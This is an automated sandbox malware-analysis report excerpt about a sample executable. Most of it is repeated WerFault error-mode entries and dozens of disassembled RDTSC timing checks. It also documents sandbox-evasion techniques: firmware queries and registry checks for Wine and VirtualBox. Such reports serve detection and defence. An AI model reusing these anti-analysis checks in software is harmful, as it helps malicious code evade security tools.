              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: A87F29 second address: A87F38 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFA57D second address: BFA594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC0410B9FADh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFEBF5 second address: BFEC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC040F643F6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFEC00 second address: BFEC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFEC05 second address: BFEC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFEC0B second address: BFEC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFF34B second address: BFF374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC040F64407h 0x0000000c jmp 00007FC040F643FBh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BFF374 second address: BFF37A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BB6 second address: C01BD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC040F643FEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BD6 second address: C01BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BDA second address: C01BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BE9 second address: C01BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BED second address: C01BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01BF3 second address: C01C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC0410B9FAEh 0x00000008 jmp 00007FC0410B9FAAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007FC0410B9FA6h 0x0000001d jmp 00007FC0410B9FB8h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01C37 second address: C01C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01D7D second address: C01D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01EB8 second address: C01F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 and esi, 4425DEC6h 0x0000000f xor dword ptr [ebp+122D2BCAh], esi 0x00000015 push 00000000h 0x00000017 movzx esi, ax 0x0000001a call 00007FC040F643F9h 0x0000001f jbe 00007FC040F6440Bh 0x00000025 jmp 00007FC040F64405h 0x0000002a push eax 0x0000002b jno 00007FC040F64404h 0x00000031 mov eax, dword ptr [esp+04h] 0x00000035 jmp 00007FC040F64402h 0x0000003a mov eax, dword ptr [eax] 0x0000003c jmp 00007FC040F643FFh 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 ja 00007FC040F643FCh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01F44 second address: C01F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D3CA2h] 0x0000000f push 00000003h 0x00000011 jmp 00007FC0410B9FB2h 0x00000016 push 00000000h 0x00000018 push 00000003h 0x0000001a push eax 0x0000001b jmp 00007FC0410B9FB2h 0x00000020 pop edi 0x00000021 cld 0x00000022 push 8E0264DAh 0x00000027 pushad 0x00000028 pushad 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01F8B second address: C01FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC040F64408h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C01FAA second address: C01FE3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 4E0264DAh 0x00000012 mov dword ptr [ebp+122D2C1Eh], ecx 0x00000018 lea ebx, dword ptr [ebp+1244DAE4h] 0x0000001e jmp 00007FC0410B9FB4h 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pop edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C0209D second address: C020CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC040F643FFh 0x00000008 jno 00007FC040F643F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007FC040F643FCh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C020CA second address: C021A0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC0410B9FBDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FC0410B9FB4h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FC0410B9FB9h 0x0000001a pop eax 0x0000001b pushad 0x0000001c sub dword ptr [ebp+122D39A4h], edi 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+122D3BAAh] 0x00000029 push 00000003h 0x0000002b mov edi, ecx 0x0000002d pushad 0x0000002e mov ecx, dword ptr [ebp+122D3B02h] 0x00000034 jmp 00007FC0410B9FAFh 0x00000039 popad 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FC0410B9FA8h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2CE1h], eax 0x0000005c push 00000003h 0x0000005e sbb edx, 5F94B587h 0x00000064 mov edx, dword ptr [ebp+122D3C8Eh] 0x0000006a push 87626803h 0x0000006f pushad 0x00000070 jmp 00007FC0410B9FB3h 0x00000075 ja 00007FC0410B9FACh 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C021A0 second address: C021EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 47626803h 0x0000000c xor dword ptr [ebp+122D3578h], esi 0x00000012 lea ebx, dword ptr [ebp+1244DAEFh] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FC040F643F8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 sbb di, 626Ah 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC040F643FAh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C021EC second address: C021F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C141FA second address: C1422E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC040F64409h 0x00000008 jmp 00007FC040F64403h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC040F64404h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22458 second address: C2245C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2245C second address: C22464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C225A4 second address: C225AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C225AB second address: C225CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F643FAh 0x00000009 jmp 00007FC040F64401h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22887 second address: C2288C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2288C second address: C22896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22896 second address: C228A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C228A1 second address: C228AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C228AB second address: C228DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC0410B9FB9h 0x0000000a push ebx 0x0000000b jp 00007FC0410B9FA6h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 jnl 00007FC0410B9FA6h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22B5C second address: C22B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22B62 second address: C22B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FACh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FC0410B9FB7h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22B93 second address: C22B99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C22FD0 second address: C22FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB2h 0x00000007 jg 00007FC0410B9FAEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23157 second address: C2315B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2329D second address: C232B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C232B8 second address: C232CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F64403h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23523 second address: C23528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23528 second address: C23538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC040F643FBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF062B second address: BF0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF0637 second address: BF063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF063F second address: BF0645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23F5A second address: C23F62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23F62 second address: C23F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FAAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23F71 second address: C23FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64402h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FC040F64432h 0x00000012 pushad 0x00000013 jmp 00007FC040F64409h 0x00000018 jmp 00007FC040F643FFh 0x0000001d popad 0x0000001e jne 00007FC040F64402h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C23FC2 second address: C23FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C24133 second address: C24139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C28472 second address: C2847A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2847A second address: C2847E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C28892 second address: C288BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC0410B9FB0h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f js 00007FC0410B9FA6h 0x00000015 js 00007FC0410B9FA6h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BE7D22 second address: BE7D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BE7D28 second address: BE7D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC0410B9FAAh 0x0000000d jne 00007FC0410B9FA6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BE7D4B second address: BE7D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FC040F643FEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2EE04 second address: C2EE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C2EE09 second address: C2EE10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C322A6 second address: C322AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C324FE second address: C32502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32502 second address: C32508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32508 second address: C3250E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32D22 second address: C32D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C32D26 second address: C32D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
